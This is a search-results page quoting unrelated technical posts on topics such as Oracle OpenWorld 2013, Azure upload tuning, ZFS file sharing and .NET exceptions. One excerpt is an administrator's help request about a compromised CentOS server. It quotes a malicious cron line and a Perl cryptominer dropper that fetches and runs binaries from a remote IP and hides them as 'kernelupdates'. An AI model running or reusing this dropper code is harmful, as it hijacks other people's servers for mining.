Search Results

Search found 95201 results on 3809 pages for 'system data sqlite'.

Page 632/3809 | < Previous Page | 628 629 630 631 632 633 634 635 636 637 638 639  | Next Page >

  • Oracle OpenWorld 2013 – Wrap up by Sven Bernhardt

    - by JuergenKress
    OOW 2013 is over and we’re heading home, so it is time to lean back and reflecting about the impressions we have from the conference. First of all: OOW was great! It was a pleasure to be a part of it. As already mentioned in our last blog article: It was the biggest OOW ever. Parallel to the conference the America’s Cup took place in San Francisco and the Oracle Team America won. Amazing job by the team and again congratulations from our side Back to the conference. The main topics for us are: Oracle SOA / BPM Suite 12c Adaptive Case management (ACM) Big Data Fast Data Cloud Mobile Below we will go a little more into detail, what are the key takeaways regarding the mentioned points: Oracle SOA / BPM Suite 12c During the five days at OOW, first details of the upcoming major release of Oracle SOA Suite 12c and Oracle BPM Suite 12c have been introduced. Some new key features are: Managed File Transfer (MFT) for transferring big files from a source to a target location Enhanced REST support by introducing a new REST binding Introduction of a generic cloud adapter, which can be used to connect to different cloud providers, like Salesforce Enhanced analytics with BAM, which has been totally reengineered (BAM Console now also runs in Firefox!) Introduction of templates (OSB pipelines, component templates, BPEL activities templates) EM as a single monitoring console OSB design-time integration into JDeveloper (Really great!) Enterprise modeling capabilities in BPM Composer These are only a few points from what is coming with 12c. We are really looking forward for the new realese to come out, because this seems to be really great stuff. The suite becomes more and more integrated. From 10g to 11g it was an evolution in terms of developing SOA-based applications. With 12c, Oracle continues it’s way – very impressive. Adaptive Case Management Another fantastic topic was Adaptive Case Management (ACM). The Oracle PMs did a great job especially at the demo grounds in showing the upcoming Case Management UI (will be available in 11g with the next BPM Suite MLR Patch), the roadmap and the differences between traditional business process modeling. They have been very busy during the conference because a lot of partners and customers have been interested Big Data Big Data is one of the current hype themes. Because of huge data amounts from different internal or external sources, the handling of these data becomes more and more challenging. Companies have a need for analyzing the data to optimize their business. The challenge is here: the amount of data is growing daily! To store and analyze the data efficiently, it is necessary to have a scalable and flexible infrastructure. Here it is important that hardware and software are engineered to work together. Therefore several new features of the Oracle Database 12c, like the new in-memory option, have been presented by Larry Ellison himself. From a hardware side new server machines like Fujitsu M10 or new processors, such as Oracle’s new M6-32 have been announced. The performance improvements, when using one of these hardware components in connection with the improved software solutions were really impressive. For more details about this, please take look at our previous blog post. Regarding Big Data, Oracle also introduced their Big Data architecture, which consists of: Oracle Big Data Appliance that is preconfigured with Hadoop Oracle Exdata which stores a huge amount of data efficently, to achieve optimal query performance Oracle Exalytics as a fast and scalable Business analytics system Analysis of the stored data can be performed using SQL, by streaming the data directly from Hadoop to an Oracle Database 12c. Alternatively the analysis can be directly implemented in Hadoop using “R”. In addition Oracle BI Tools can be used to analyze the data. Fast Data Fast Data is a complementary approach to Big Data. A huge amount of mostly unstructured data comes in via different channels with a high frequency. The analysis of these data streams is also important for companies, because the incoming data has to be analyzed regarding business-relevant patterns in real-time. Therefore these patterns must be identified efficiently and performant. To do so, in-memory grid solutions in combination with Oracle Coherence and Oracle Event Processing demonstrated very impressive how efficient real-time data processing can be. One example for Fast Data solutions that was shown during the OOW was the analysis of twitter streams regarding customer satisfaction. The feeds with negative words like “bad” or “worse” have been filtered and after a defined treshold has been reached in a certain timeframe, a business event was triggered. Cloud Another key trend in the IT market is of course Cloud Computing and what it means for companies and their businesses. Oracle announced their Cloud strategy and vision – companies can focus on their real business while all of the applications are available via Cloud. This also includes Oracle Database or Oracle Weblogic, so that companies can also build, deploy and run their own applications within the cloud. Three different approaches have been introduced: Infrastructure as a Service (IaaS) Platform as a Service (PaaS) Software as a Service (SaaS) Using the IaaS approach only the infrastructure components will be managed in the Cloud. Customers will be very flexible regarding memory, storage or number of CPUs because those parameters can be adjusted elastically. The PaaS approach means that besides the infrastructure also the platforms (such as databases or application servers) necessary for running applications will be provided within the Cloud. Here customers can also decide, if installation and management of these infrastructure components should be done by Oracle. The SaaS approach describes the most complete one, hence all applications a company uses are managed in the Cloud. Oracle is planning to provide all of their applications, like ERP systems or HR applications, as Cloud services. In conclusion this seems to be a very forward-thinking strategy, which opens up new possibilities for customers to manage their infrastructure and applications in a flexible, scalable and future-oriented manner. As you can see, our OOW days have been very very interresting. We collected many helpful informations for our projects. The new innovations presented at the confernce are great and being part of this was even greater! We are looking forward to next years’ conference! Links: http://www.oracle.com/openworld/index.html http://thecattlecrew.wordpress.com/2013/09/23/first-impressions-from-oracle-open-world-2013 SOA & BPM Partner Community For regular information on Oracle SOA Suite become a member in the SOA & BPM Partner Community for registration please visit www.oracle.com/goto/emea/soa (OPN account required) If you need support with your account please contact the Oracle Partner Business Center. Blog Twitter LinkedIn Facebook Wiki Mix Forum Technorati Tags: cattleCrew,Sven Bernhard,OOW2013,SOA Community,Oracle SOA,Oracle BPM,Community,OPN,Jürgen Kress

    Read the article

  • External File Upload Optimizations for Windows Azure

    - by rgillen
    [Cross posted from here: http://rob.gillenfamily.net/post/External-File-Upload-Optimizations-for-Windows-Azure.aspx] I’m wrapping up a bit of the work we’ve been doing on data movement optimizations for cloud computing and the latest set of data yielded some interesting points I thought I’d share. The work done here is not really rocket science but may, in some ways, be slightly counter-intuitive and therefore seemed worthy of posting. Summary: for those who don’t like to read detailed posts or don’t have time, the synopsis is that if you are uploading data to Azure, block your data (even down to 1MB) and upload in parallel. Set your block size based on your source file size, but if you must choose a fixed value, use 1MB. Following the above will result in significant performance gains… upwards of 10x-24x and a reduction in overall file transfer time of upwards of 90% (eg, uploading a 1GB file averaged 46.37 minutes prior to optimizations and averaged 1.86 minutes afterwards). Detail: For those of you who want more detail, or think that the claims at the end of the preceding paragraph are over-reaching, what follows is information and code supporting these claims. As the title would indicate, these tests were run from our research facility pointing to the Azure cloud (specifically US North Central as it is physically closest to us) and do not represent intra-cloud results… we have performed intra-cloud tests and the overall results are similar in notion but the data rates are significantly different as well as the tipping points for the various block sizes… this will be detailed separately). We started by building a very simple console application that would loop through a directory and upload each file to Azure storage. This application used the shipping storage client library from the 1.1 version of the azure tools. The only real variation from the client library is that we added code to collect and record the duration (in ms) and size (in bytes) for each file transferred. The code is available here. We then created a directory that had a collection of files for the following sizes: 2KB, 32KB, 64KB, 128KB, 512KB, 1MB, 5MB, 10MB, 25MB, 50MB, 100MB, 250MB, 500MB, 750MB, and 1GB (50 files for each size listed). These files contained randomly-generated binary data and do not benefit from compression (a separate discussion topic). Our file generation tool is available here. The baseline was established by running the application described above against the directory containing all of the data files. This application uploads the files in a random order so as to avoid transferring all of the files of a given size sequentially and thereby spreading the affects of periodic Internet delays across the collection of results.  We then ran some scripts to split the resulting data and generate some reports. The raw data collected for our non-optimized tests is available via the links in the Related Resources section at the bottom of this post. For each file size, we calculated the average upload time (and standard deviation) and the average transfer rate (and standard deviation). As you likely are aware, transferring data across the Internet is susceptible to many transient delays which can cause anomalies in the resulting data. It is for this reason that we randomized the order of source file processing as well as executed the tests 50x for each file size. We expect that these steps will yield a sufficiently balanced set of results. Once the baseline was collected and analyzed, we updated the test harness application with some methods to split the source file into user-defined block sizes and then to upload those blocks in parallel (using the PutBlock() method of Azure storage). The parallelization was handled by simply relying on the Parallel Extensions to .NET to provide a Parallel.For loop (see linked source for specific implementation details in Program.cs, line 173 and following… less than 100 lines total). Once all of the blocks were uploaded, we called PutBlockList() to assemble/commit the file in Azure storage. For each block transferred, the MD5 was calculated and sent ensuring that the bits that arrived matched was was intended. The timer for the blocked/parallelized transfer method wraps the entire process (source file splitting, block transfer, MD5 validation, file committal). A diagram of the process is as follows: We then tested the affects of blocking & parallelizing the transfers by running the updated application against the same source set and did a parameter sweep on the block size including 256KB, 512KB, 1MB, 2MB, and 4MB (our assumption was that anything lower than 256KB wasn’t worth the trouble and 4MB is the maximum size of a block supported by Azure). The raw data for the parallel tests is available via the links in the Related Resources section at the bottom of this post. This data was processed and then compared against the single-threaded / non-optimized transfer numbers and the results were encouraging. The Excel version of the results is available here. Two semi-obvious points need to be made prior to reviewing the data. The first is that if the block size is larger than the source file size you will end up with a “negative optimization” due to the overhead of attempting to block and parallelize. The second is that as the files get smaller, the clock-time cost of blocking and parallelizing (overhead) is more apparent and can tend towards negative optimizations. For this reason (and is supported in the raw data provided in the linked worksheet) the charts and dialog below ignore source file sizes less than 1MB. (click chart for full size image) The chart above illustrates some interesting points about the results: When the block size is smaller than the source file, performance increases but as the block size approaches and then passes the source file size, you see decreasing benefit to the point of negative gains (see the values for the 1MB file size) For some of the moderately-sized source files, small blocks (256KB) are best As the size of the source file gets larger (see values for 50MB and up), the smallest block size is not the most efficient (presumably due, at least in part, to the increased number of blocks, increased number of individual transfer requests, and reassembly/committal costs). Once you pass the 250MB source file size, the difference in rate for 1MB to 4MB blocks is more-or-less constant The 1MB block size gives the best average improvement (~16x) but the optimal approach would be to vary the block size based on the size of the source file.    (click chart for full size image) The above is another view of the same data as the prior chart just with the axis changed (x-axis represents file size and plotted data shows improvement by block size). It again highlights the fact that the 1MB block size is probably the best overall size but highlights the benefits of some of the other block sizes at different source file sizes. This last chart shows the change in total duration of the file uploads based on different block sizes for the source file sizes. Nothing really new here other than this view of the data highlights the negative affects of poorly choosing a block size for smaller files.   Summary What we have found so far is that blocking your file uploads and uploading them in parallel results in significant performance improvements. Further, utilizing extension methods and the Task Parallel Library (.NET 4.0) make short work of altering the shipping client library to provide this functionality while minimizing the amount of change to existing applications that might be using the client library for other interactions.   Related Resources Source code for upload test application Source code for random file generator ODatas feed of raw data from non-optimized transfer tests Experiment Metadata Experiment Datasets 2KB Uploads 32KB Uploads 64KB Uploads 128KB Uploads 256KB Uploads 512KB Uploads 1MB Uploads 5MB Uploads 10MB Uploads 25MB Uploads 50MB Uploads 100MB Uploads 250MB Uploads 500MB Uploads 750MB Uploads 1GB Uploads Raw Data OData feeds of raw data from blocked/parallelized transfer tests Experiment Metadata Experiment Datasets Raw Data 256KB Blocks 512KB Blocks 1MB Blocks 2MB Blocks 4MB Blocks Excel worksheet showing summarizations and comparisons

    Read the article

  • Webcast: John Fowler Reveals The Next Step In Data Center Consolidation – June 27 At 10 AM PT

    - by Roxana Babiciu
    Completely integrated solutions are just better. But don't take our word for it - encourage your customers and prospects to join this live webcast featuring Oracle EVP John Fowler to find out why. Participants will learn how consolidating their existing data center to this new generation of solutions will simplify architectures, jump start application deployment and improve system performance - with easy self-service and private cloud capabilities.

    Read the article

  • How to record streaming camera video and auto-erase old data before drive fills up?

    - by nLinked
    I'm interested in making my own home CCTV system using Ubuntu. I want to get network cameras similar to this: http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&item=260745150596 I want a way to dump or record the live stream to a large hard drive, but have Ubuntu automatically delete the oldest parts of the video while the drive fills, so it can continue recording new data continuously. How can this auto-delete while recording be accomplished? I've searched and searched.

    Read the article

  • How are Reads Distributed in a Workload

    - by Bill Graziano
    People have uploaded nearly one millions rows of trace data to TraceTune.  That’s enough data to start to look at the results in aggregate.  The first thing I want to look at is logical reads.  This is the easiest metric to identify and fix. When you upload a trace, I rank each statement based on the total number of logical reads.  I also calculate each statement’s percentage of the total logical reads.  I do the same thing for CPU, duration and logical writes.  When you view a statement you can see all the details like this: This single statement consumed 61.4% of the total logical reads on the system while we were tracing it.  I also wanted to see the distribution of reads across statements.  That graph looks like this: On average, the highest ranked statement consumed just under 50% of the reads on the system.  When I tune a system, I’m usually starting in one of two modes: this “piece” is slow or the whole system is slow.  If a given piece (screen, report, query, etc.) is slow you can usually find the specific statements behind it and tune it.  You can make that individual piece faster but you may not affect the whole system. When you’re trying to speed up an entire server you need to identity those queries that are using the most disk resources in aggregate.  Fixing those will make them faster and it will leave more disk throughput for the rest of the queries. Here are some of the things I’ve learned querying this data: The highest ranked query averages just under 50% of the total reads on the system. The top 3 ranked queries average 73% of the total reads on the system. The top 10 ranked queries average 91% of the total reads on the system. Remember these are averages across all the traces that have been uploaded.  And I’m guessing that people mainly upload traces where there are performance problems so your mileage may vary. I also learned that slow queries aren’t the problem.  Before I wrote ClearTrace I used to identify queries by filtering on high logical reads using Profiler.  That picked out individual queries but those rarely ran often enough to put a large load on the system. If you look at the execution count by rank you’d see that the highest ranked queries also have the highest execution counts.  The graph would look very similar to the one above but flatter.  These queries don’t look that bad individually but run so often that they hog the disk capacity. The take away from all this is that you really should be tuning the top 10 queries if you want to make your system faster.  Tuning individually slow queries will help those specific queries but won’t have much impact on the system as a whole.

    Read the article

  • Welcome to ubiquitous file sharing (December 08, 2009)

    - by user12612012
    The core of any file server is its file system and ZFS provides the foundation on which we have built our ubiquitous file sharing and single access control model.  ZFS has a rich, Windows and NFSv4 compatible, ACL implementation (ZFS only uses ACLs), it understands both UNIX IDs and Windows SIDs and it is integrated with the identity mapping service; it knows when a UNIX/NIS user and a Windows user are equivalent, and similarly for groups.  We have a single access control architecture, regardless of whether you are accessing the system via NFS or SMB/CIFS.The NFS and SMB protocol services are also integrated with the identity mapping service and shares are not restricted to UNIX permissions or Windows permissions.  All access control is performed by ZFS, the system can always share file systems simultaneously over both protocols and our model is native access to any share from either protocol.Modal architectures have unnecessary restrictions, confusing rules, administrative overhead and weird deployments to try to make them work; they exist as a compromise not because they offer a benefit.  Having some shares that only support UNIX permissions, others that only support ACLs and some that support both in a quirky way really doesn't seem like the sort of thing you'd want in a multi-protocol file server.  Perhaps because the server has been built on a file system that was designed for UNIX permissions, possibly with ACL support bolted on as an add-on afterthought, or because the protocol services are not truly integrated with the operating system, it may not be capable of supporting a single integrated model.With a single, integrated sharing and access control model: If you connect from Windows or another SMB/CIFS client: The system creates a credential containing both your Windows identity and your UNIX/NIS identity.  The credential includes UNIX/NIS IDs and SIDs, and UNIX/NIS groups and Windows groups. If your Windows identity is mapped to an ephemeral ID, files created by you will be owned by your Windows identity (ZFS understands both UNIX IDs and Windows SIDs). If your Windows identity is mapped to a real UNIX/NIS UID, files created by you will be owned by your UNIX/NIS identity. If you access a file that you previously created from UNIX, the system will map your UNIX identity to your Windows identity and recognize that you are the owner.  Identity mapping also supports access checking if you are being assessed for access via the ACL. If you connect via NFS (typically from a UNIX client): The system creates a credential containing your UNIX/NIS identity (including groups). Files you create will be owned by your UNIX/NIS identity. If you access a file that you previously created from Windows and the file is owned by your UID, no mapping is required. Otherwise the system will map your Windows identity to your UNIX/NIS identity and recognize that you are the owner.  Again, mapping is fully supported during ACL processing. The NFS, SMB/CIFS and ZFS services all work cooperatively to ensure that your UNIX identity and your Windows identity are equivalent when you access the system.  This, along with the single ACL-based access control implementation, results in a system that provides that elusive ubiquitous file sharing experience.

    Read the article

  • How to apply Data Oriented Design with Object Oriented Programming?

    - by Pombal
    Hi. I've read lots of articles about DOD and I understand it but I can't design an Object Oriented system with DOD in mind, I think my OOP education is blocking me. How should I think to mix the two? The objective is to have a nice OO interface while using DOD behind the scenes. I saw this too but didn't help much: http://stackoverflow.com/questions/3872354/how-to-apply-dop-and-keep-a-nice-user-interface

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!

    Read the article

  • SQL Server - Physical connection is not usable Error Code: 19

    - by Harry
    Having trouble working out this SqlException: A transport-level error has occurred when sending the request to the server. (provider: Session Provider, error: 19 - Physical connection is not usable) Any ideas what this is about? Couldn't get any hits on google or msdn on this one. The connection is MARS and Asynchronous in my own SQL pool. But don't get all excited about that - that is old code that has been stable for a long time! Exception details pasted below: System.Data.SqlClient.SqlException occurred Message=A transport-level error has occurred when sending the request to the server. (provider: Session Provider, error: 19 - Physical connection is not usable) Source=.Net SqlClient Data Provider ErrorCode=-2146232060 Class=20 LineNumber=0 Number=-1 Server=SERVER State=0 StackTrace: at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning() at System.Data.SqlClient.TdsParserStateObject.SNIWriteAsync(SNIHandle handle, SNIPacket packet, DbAsyncResult asyncResult) at System.Data.SqlClient.TdsParserStateObject.WriteSni() at System.Data.SqlClient.TdsParserStateObject.WritePacket(Byte flushMode) at System.Data.SqlClient.TdsParserStateObject.ExecuteFlush() at System.Data.SqlClient.TdsParser.TdsExecuteRPC(_SqlRPC[] rpcArray, Int32 timeout, Boolean inSchema, SqlNotificationRequest notificationRequest, TdsParserStateObject stateObj, Boolean isCommandProc) at System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(DbAsyncResult result, String methodName, Boolean sendToPipe) at System.Data.SqlClient.SqlCommand.BeginExecuteNonQuery(AsyncCallback callback, Object stateObject) at CrawlAbout.Library.SQL.SQLAdapter.<ExecuteNonQueryTask>d__12.MoveNext() in D:\Work\Projects\CrawlAbout.com 2.0\CrawlAbout.Library.SQL\SQLAdapter.cs:line 149 InnerException:

    Read the article

  • Use MTOM/streaming from C# calling a webservice in java exposed via jaxws

    - by raticulin
    We have this webservice created with jax-ws @WebService(name = "Mywebser", targetNamespace = "http://namespace") @MTOM(threshold = 2048) @SOAPBinding(style = SOAPBinding.Style.DOCUMENT, use = SOAPBinding.Use.LITERAL, parameterStyle = SOAPBinding.ParameterStyle.WRAPPED) public class Mywebser { @WebMethod(operationName = "doStreaming", action = "urn:doStreaming") @WebResult(name = "return") public ResultInfo doStreaming(String username, String pwd, @XmlMimeType("application/octet-stream") DataHandler data, boolean overw){ ... } } The generated client side looks like this: @WebMethod(action = "urn:doStreaming") @WebResult(targetNamespace = "") @RequestWrapper(localName = "doStreaming", targetNamespace = "http://namespace", className = "com.mypack.client.doStreaming") @ResponseWrapper(localName = "doStreamingResponse", targetNamespace = "http://namespace", className = "com.mypack.client.doStreamingResponse") public ResultInfo doStreaming( @WebParam(name = "arg0", targetNamespace = "") String arg0, @WebParam(name = "arg1", targetNamespace = "") String arg1, @WebParam(name = "arg2", targetNamespace = "") DataHandler arg2, @WebParam(name = "arg3", targetNamespace = "") boolean arg3); By using it this way it uses streaming properly (verified we can pass an argument of 80mb when the jvm had less allowed. MywebserService serv = ...; Mywebser wso = serv.getMywebserPort(new MTOMFeature()); Map<String, Object> ctxt = ((BindingProvider) wso).getRequestContext(); ctxt.put(JAXWSProperties.HTTP_CLIENT_STREAMING_CHUNK_SIZE, 8192); DataHandler dataHandler = new DataHandler(new FileDataSource("c:\\temp\\A.dat")); arcres = wso.doStreaming("a", "b", dataHandler, true); We generate a clienet for .net, with VS2008, using "Add Web Reference", we get this C# code: [System.Web.Services.Protocols.SoapDocumentMethodAttribute("urn:doStreaming",RequestNamespace="http://namespace",ResponseNamespace="http://namespace",Use=System.Web.Services.Description.SoapBindingUse.Literal,ParameterStyle=System.Web.Services.Protocols.SoapParameterStyle.Wrapped)] [return: System.Xml.Serialization.XmlElementAttribute("return",Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] public ResultInfo doStreaming( [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] string arg0, [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] string arg1, [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified,DataType="base64Binary")] byte[] arg2, [System.Xml.Serialization.XmlElementAttribute(Form=System.Xml.Schema.XmlSchemaForm.Unqualified)] bool arg3) Apparently this is not using streaming? The type base64Binary of arg2 seems not the right one? In java it's a DataHandler. By testing it with low memory on the java side we can see it is not using streaming as it fails with OOM. Does someone knows if this is possible, and if so how? Our environment: server: jdk1.6, jaxws 2.1.7 client: C# 2.0, visual studio 2008

    Read the article

  • MSSQL - Physical connection is not usable Error Code: 19

    - by Harry
    Having trouble working out this SqlException: A transport-level error has occurred when sending the request to the server. (provider: Session Provider, error: 19 - Physical connection is not usable) Any ideas what this is about? Couldn't get any hits on google or msdn on this one. The connection is MARS and Asynchronous in my own SQL pool. But don't get all excited about that - that is old code that has been stable for a long time! Exception details pasted below: System.Data.SqlClient.SqlException occurred Message=A transport-level error has occurred when sending the request to the server. (provider: Session Provider, error: 19 - Physical connection is not usable) Source=.Net SqlClient Data Provider ErrorCode=-2146232060 Class=20 LineNumber=0 Number=-1 Server=SERVER State=0 StackTrace: at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning() at System.Data.SqlClient.TdsParserStateObject.SNIWriteAsync(SNIHandle handle, SNIPacket packet, DbAsyncResult asyncResult) at System.Data.SqlClient.TdsParserStateObject.WriteSni() at System.Data.SqlClient.TdsParserStateObject.WritePacket(Byte flushMode) at System.Data.SqlClient.TdsParserStateObject.ExecuteFlush() at System.Data.SqlClient.TdsParser.TdsExecuteRPC(_SqlRPC[] rpcArray, Int32 timeout, Boolean inSchema, SqlNotificationRequest notificationRequest, TdsParserStateObject stateObj, Boolean isCommandProc) at System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(DbAsyncResult result, String methodName, Boolean sendToPipe) at System.Data.SqlClient.SqlCommand.BeginExecuteNonQuery(AsyncCallback callback, Object stateObject) at CrawlAbout.Library.SQL.SQLAdapter.<ExecuteNonQueryTask>d__12.MoveNext() in D:\Work\Projects\CrawlAbout.com 2.0\CrawlAbout.Library.SQL\SQLAdapter.cs:line 149 InnerException:

    Read the article

  • How set EnqueueCallBack to my generic callback

    - by CrazyJoe
    using System; using System.Windows; using System.Windows.Controls; using System.Windows.Documents; using System.Windows.Ink; using System.Windows.Input; using System.Windows.Media; using System.Windows.Media.Animation; using System.Windows.Shapes; using Microsistec.Domain; using Microsistec.Client; using Microsoft.VisualStudio.TestTools.UnitTesting; using System.Collections.Generic; using Microsistec.Tools; using System.Json; using Microsistec.SystemConfig; using System.Threading; using Microsoft.Silverlight.Testing; namespace Test { [TestClass] public class SampleTest : SilverlightTest { [TestMethod, Asynchronous] public void login() { List<PostData> data = new List<PostData>(); data.Add(new PostData("email", "xxx")); data.Add(new PostData("password", MD5.GetHashString("xxx"))); WebClient.sendData(Config.DataServerURL + "/user/login", data, LoginCallBack); EnqueueCallback(?????????); EnqueueTestComplete(); } [Asynchronous] public void LoginCallBack(object sender, System.Net.UploadStringCompletedEventArgs e) { string json = Microsistec.Client.WebClient.ProcessResult(e); var result = JsonArray.Parse(json); Assert.Equals("1", result["value"].ToString()); TestComplete(); } } Im tring to set ???????? value but my callback is generic, it is setup on my WebClient .SendData, how i implement my EnqueueCallback to a my already functio LoginCallBack???

    Read the article

  • Trouble running setup package after Publishing in Visual Studio 2008

    - by Andrew Cooper
    I've got a small winform application that I've written that is running fine in the IDE. It builds with no errors or warnings. It's not using any third party controls. I'm coding in C# in Visual Studio 2008. When I Build -- Publish the application, everything seems to work fine. However, when I go and attempt to install the application via the setup.exe file I get an error message that says, "Application cannot be started." The error details are below: ERROR DETAILS Following errors were detected during this operation. * [3/18/2010 10:50:56 AM] System.Runtime.InteropServices.COMException - The referenced assembly is not installed on your system. (Exception from HRESULT: 0x800736B3) - Source: System.Deployment - Stack trace: at System.Deployment.Internal.Isolation.IStore.GetAssemblyInformation(UInt32 Flags, IDefinitionIdentity DefinitionIdentity, Guid& riid) at System.Deployment.Internal.Isolation.Store.GetAssemblyManifest(UInt32 Flags, IDefinitionIdentity DefinitionIdentity) at System.Deployment.Application.ComponentStore.GetAssemblyManifest(DefinitionIdentity asmId) at System.Deployment.Application.ComponentStore.GetSubscriptionStateInternal(DefinitionIdentity subId) at System.Deployment.Application.SubscriptionStore.GetSubscriptionStateInternal(SubscriptionState subState) at System.Deployment.Application.ComponentStore.CollectCrossGroupApplications(Uri codebaseUri, DefinitionIdentity deploymentIdentity, Boolean& identityGroupFound, Boolean& locationGroupFound, String& identityGroupProductName) at System.Deployment.Application.SubscriptionStore.CommitApplication(SubscriptionState& subState, CommitApplicationParams commitParams) at System.Deployment.Application.ApplicationActivator.InstallApplication(SubscriptionState& subState, ActivationDescription actDesc) at System.Deployment.Application.ApplicationActivator.PerformDeploymentActivation(Uri activationUri, Boolean isShortcut, String textualSubId, String deploymentProviderUrlFromExtension, BrowserSettings browserSettings, String& errorPageUrl) at System.Deployment.Application.ApplicationActivator.ActivateDeploymentWorker(Object state) I'm not sure what else to do. The only slightly odd thing I used in this application is the SQL Compact Server. Any help would be appreciated. Thanks, Andrew

    Read the article

  • SerializationException Occurring Only in Release Mode

    - by Calvin Nguyen
    Hi, I am working on an ASP.NET web app using Visual Studio 2008 and a third-party library. Things are fine in my development environment. Things are also good if the web app is deployed in Debug configuration. However, when it is deployed in Release mode, SerializationExceptions appear intermittently, breaking other functionality. In the Windows event log, the following error can be seen: "An unhandled exception occurred and the process was terminated. Application ID: DefaultDomain Process ID: 3972 Exception: System.Runtime.Serialization.SerializationException Message: Unable to find assembly 'MyThirdPartyLibrary, Version=1.234.5.67, Culture=neutral, PublicKeyToken=3d67ed1f87d44c89'. StackTrace: at System.Runtime.Serialization.Formatters.Binary.BinaryAssemblyInfo.GetAssembly( ) at System.Runtime.Serialization.Formatters.Binary.ObjectReader.GetType(BinaryAsse mblyInfo assemblyInfo, String name) at System.Runtime.Serialization.Formatters.Binary.ObjectMap..ctor(String objectName, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable) at System.Runtime.Serialization.Formatters.Binary.ObjectMap.Create(String name, String[] memberNames, BinaryTypeEnum[] binaryTypeEnumA, Object[] typeInformationA, Int32[] memberAssemIds, ObjectReader objectReader, Int32 objectId, BinaryAssemblyInfo assemblyInfo, SizedArray assemIdToAssemblyTable) at System.Runtime.Serialization.Formatters.Binary._BinaryParser.ReadObjectWithMa pTyped(BinaryObjectWithMapTyped record) at System.Runtime.Serialization.Formatters.Binary._BinaryParser.ReadObjectWithMa pTyped(BinaryHeaderEnum binaryHeaderEnum) at System.Runtime.Serialization.Formatters.Binary.__BinaryParser.Run() at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(Header Handler handler, __BinaryParser serParser, Boolean fCheck, Boolean isCrossAppDomain, IMethodCallMessage methodCallMessage) at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Str eam serializationStream, HeaderHandler handler, Boolean fCheck, Boolean isCrossAppDomain, IMethodCallMessage methodCallMessage) at System.Runtime.Remoting.Channels.CrossAppDomainSerializer.DeserializeObject(Me moryStream stm) at System.AppDomain.Deserialize(Byte[] blob) at 